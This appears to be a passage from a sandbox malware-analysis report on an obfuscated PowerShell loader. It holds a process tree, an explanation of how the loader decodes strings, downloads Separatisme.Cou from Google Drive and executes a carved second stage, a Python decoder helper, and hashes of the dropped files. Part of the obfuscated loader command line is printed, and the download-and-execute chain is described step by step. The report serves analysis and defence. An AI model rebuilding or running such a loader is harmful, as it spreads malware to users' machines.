prjoStjenFjo.cUncioSa.anFlaacRogue ProsTyphsHijii riv BogePriv1.ndu7Skaa7fu i=Sk,p$ Ti,hFarciBo.djKirka M,pc rgkNonseanotrTegnnSeleeAut sElev. C ns Genu Hj.bReprsMisptOutsrE aeiUdr n.oilgDepe( Dun$TituMAlauo .venExcrkSociiCil.sP ech.leal ndpySyst,Dybv$Pl.dBGenie Ti,sF sskPrisnPr.nk,ikme UnpnUho dOpsteemits urg)D.ss ');Selvtugten $Nonconcessive177;"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • System Time Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1516
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Separatisme.Cou && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2880
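
    The PowerShell command line above is the same script run three times: WScript.exe starts the 64-bit powershell.exe (PID 2708), which uses cmd.exe to re-launch the identical script under the 32-bit SysWOW64 PowerShell (PID 1516); the NtSetInformationThreadHideFromDebugger signature and the 53.7 MB region at memory/1516-33 are recorded against that 32-bit instance. Every string in the script passes through one decoder, godkendelsesbefjelsernes, which keeps every fifth character starting at index 4 and, because $Fodballen becomes 1 whenever $host.PrivateData is non-null, never reaches the final padding group; the Selvtugten wrapper dot-sources the decoded text through iex. Decoded, $Ethyls is the User-Agent header name and $Unembarrassed a Firefox 121 User-Agent value; $Kompasnaals is a Google Drive uc?export=download URL; the cmd.exe /c "echo %appdata%\Separatisme.Cou && echo t" children return both the drop path ($Trovrdigste[0]) and the letter "t" that the script appends to the decoded "...New-Object System.Net.WebClien" to complete the class name. The downloaded Separatisme.Cou is then base64-decoded, ASCII-decoded, and a 28841-character slice at offset 280932 ($Monkishly, $Besknkendes) is executed as the next stage.

    The Python below is an added analyst helper, not part of this report or of the sample: it replays the string decoder over a constructed fragment and carves the second stage out of a constructed stand-in for Separatisme.Cou using the script's real offsets. Only literals without runs of spaces decode correctly from this page's text, because the page extraction collapsed double spaces inside the longer literals; everything labelled constructed or assumed in the comments is mine.

```python
from __future__ import annotations

import base64
import re

# The loader's string decoder, as defined in the command line above:
#   for ($i = 4; $i -lt ($s.Length - $Fodballen); $i += 5) { $out += $s[$i] }
# Each literal is a run of 5-character groups (4 junk characters, then one real
# one) followed by one padding group. $Fodballen is 1 when $host.PrivateData is
# non-null (the stock console host, including the sandbox run above), which is
# what keeps the padding group out of the result.
DECODER_NAME = "godkendelsesbefjelsernes"   # decoder function name used on this page


def decode_literal(encoded: str, skip_last: int = 1) -> str:
    """Replay the PowerShell loop: indices 4, 9, 14, ... strictly below len - skip_last."""
    limit = len(encoded) - skip_last
    return "".join(encoded[i] for i in range(4, limit, 5))


def decode_script(script: str, decoder_name: str = DECODER_NAME) -> list[tuple[str, str]]:
    """Return (encoded, decoded) for every `decoder_name '...'` call found in the script."""
    pattern = re.compile(re.escape(decoder_name) + r"\s*'([^']*)'")
    return [(m.group(1), decode_literal(m.group(1))) for m in pattern.finditer(script)]


def carve_stage2(cou_bytes: bytes, offset: int = 280932, length: int = 28841) -> str:
    """Replay the loader's last step on the downloaded Separatisme.Cou:
    [Convert]::FromBase64String -> [Text.Encoding]::ASCII.GetString -> .Substring(offset, length).

    .NET's ASCII decoder maps every byte >= 0x80 to '?', so one byte becomes one char
    and the Substring offsets are byte offsets into the decoded blob. Python's 'ascii'
    codec would raise or emit U+FFFD instead, so the mapping is done by hand. The
    defaults are the $Monkishly / $Besknkendes constants from the script above.
    """
    raw = base64.b64decode(cou_bytes)   # non-alphabet characters are skipped, as .NET skips whitespace
    text = bytes(b if b < 0x80 else 0x3F for b in raw).decode("ascii")
    if offset + length > len(text):
        raise ValueError(f"decoded file is {len(text)} chars; slice ends at {offset + length}")
    return text[offset:offset + length]


def build_sample_cou(payload: str, offset: int, tail: int = 128) -> bytes:
    """Constructed stand-in for Separatisme.Cou: filler, the payload at `offset`, more filler, base64."""
    blob = b"#" * offset + payload.encode("ascii") + b"#" * tail
    return base64.b64encode(blob)


# Constructed fragment built from three literals copied verbatim from the command line
# in the process tree. These contain no runs of spaces, so they survived the page's HTML
# extraction intact; the longer literals (User-Agent value, download URL, the cmd echo
# line) had double spaces collapsed and will not decode cleanly from the page text.
# Feed those from the sandbox's raw process command line instead.
SAMPLE_FRAGMENT = (
    "$Ethyls=godkendelsesbefjelsernes 'SkysUModiSSubteAlloR Val-CereaSpilG TreeGodtNGaratAbes ';"
    "$Adresseoplysningers=godkendelsesbefjelsernes 'Zol > Va ';"
    "$Toldgrnsers=godkendelsesbefjelsernes 'Commi K,ieFlurxafb ';"
)


if __name__ == "__main__":
    for encoded, decoded in decode_script(SAMPLE_FRAGMENT):
        print(f"{encoded!r:62} -> {decoded!r}")
    # Carving demo with the script's real offsets against a constructed file.
    stage2 = "Write-Host 'stage 2 would start here'".ljust(28841, ";")
    print(carve_stage2(build_sample_cou(stage2, offset=280932))[:40])
```

    Running the decoder with skip_last=0 reproduces what happens in a host where $host.PrivateData is null: every literal gains its padding character, which is the script's cheap check against non-standard hosts. When carving a real Separatisme.Cou, compare the decoded length against offset + length first; the 403 KB file above decodes to roughly 310,000 characters, so the slice sits at the very end of the blob.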

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\CabFE6D.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0FZND7C821RO48SI770B.temp

      Filesize

      7KB

      MD5

      abaaa1d80b1d6978156e318347059065

      SHA1

      ec9a4dd6d13bb48a0105bef32cd2747c5ecb7cb3

      SHA256

      54db50ba2b7134658ed144df90476891fa7b7a7e5210b8107fdaa44bf1816ad7

      SHA512

      3115766ce4e7aaacb836222ad88994a77fc239519ae3428e1dfc1defc2c3e534f3d3b1cc6108ce9d84769546084095afe346adeae1308eb1690b3dfceaf5f23f

    • C:\Users\Admin\AppData\Roaming\Separatisme.Cou

      Filesize

      403KB

      MD5

      030a6f6849b60c1b6dda2867d97bf99c

      SHA1

      f7879cbed1fd28d8110e6d4fb1a0437a9c541428

      SHA256

      6cb8fc9218ae33c2fb8a2194d38e4ceb22ea7f96444e81e1478d0d82db379423

      SHA512

      feeead829619beb404fd815ff39b8388a66ce2e6671bb281a157ebb7201caf4b2e30a6bf3d0d2a887f1378e08a5eed30c45cde22ce4f950c3972862e64bbcbd8

    • memory/1516-33-0x0000000006790000-0x0000000009D3C000-memory.dmp

      Filesize

      53.7MB

    • memory/2708-20-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp

      Filesize

      4KB

    • memory/2708-21-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

      Filesize

      2.9MB

    • memory/2708-22-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

      Filesize

      32KB

    • memory/2708-23-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

      Filesize

      9.6MB

    • memory/2708-24-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

      Filesize

      9.6MB

    • memory/2708-25-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

      Filesize

      9.6MB

    • memory/2708-27-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

      Filesize

      9.6MB

    • memory/2708-28-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp

      Filesize

      4KB